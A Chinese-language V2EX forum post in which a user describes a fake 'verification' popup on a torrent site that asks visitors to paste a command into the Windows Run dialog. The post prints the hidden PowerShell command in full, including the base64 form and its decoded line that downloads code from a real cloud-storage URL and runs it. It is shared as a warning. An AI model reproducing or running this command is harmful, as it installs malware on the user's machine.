V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
sogwsc
V2EX  ›  分享发现

靠 网页认证居然是个病毒? 太恶心了

  •  
  •   sogwsc · 40 天前 · 736 次点击
    这是一个创建于 40 天前的主题,其中的信息可能已经有所发展或是发生改变。

    想下电影, 打开了一个种子下载的网站,https://www.torrentdownload.info/。 弹窗,只能点 ok 。 跳转到另外一个页面,tab 名叫安全认证。 我还以为是常见的真人认证,结果, 页面内容是: “Verification Steps

    1. Press Windows Button "⊞" + R
    2. Press CTRL + V
    3. Press Enter”。

    然后我就奇怪,这不是命令行吗,怎么会认证呢。 我就打开记事本,粘贴,出来一串命令。 “powershell -w hidden "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vemlwLXN0b3JlLm9zcy1hcC1zb3V0aGVhc3QtMS5hbGl5dW5jcy5jb20vRHJtZFBuT3oudHh0JykuQ29udGVudA==')) | iex"”。

    然后我把中间一串 base64 解密。 得到“iex (iwr 'https://zip-store.oss-ap-southeast-1.aliyuncs.com/DrmdPnOz.txt').Content”。

    我就想看下这个 txt 是什么内容, 在 chrome 里复制了这串地址,下载直接报危险, chrome 直接屏蔽了。 这也太恶心了吧。 如果真是病毒,照着做的人连下载都不知道。

    我是第一次遇到这种。 命令行和网址都发出来了,只是分享经历,不是分享病毒,不建议去下载。

    3 条回复
    Les1ie
        1
    Les1ie  
       40 天前
    codehz
        2
    codehz  
       40 天前
    sogwsc
        3
    sogwsc  
    OP
       39 天前
    @codehz 对 是这样的
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1801 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 21ms · UTC 16:20 · PVG 00:20 · LAX 08:20 · JFK 11:20
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.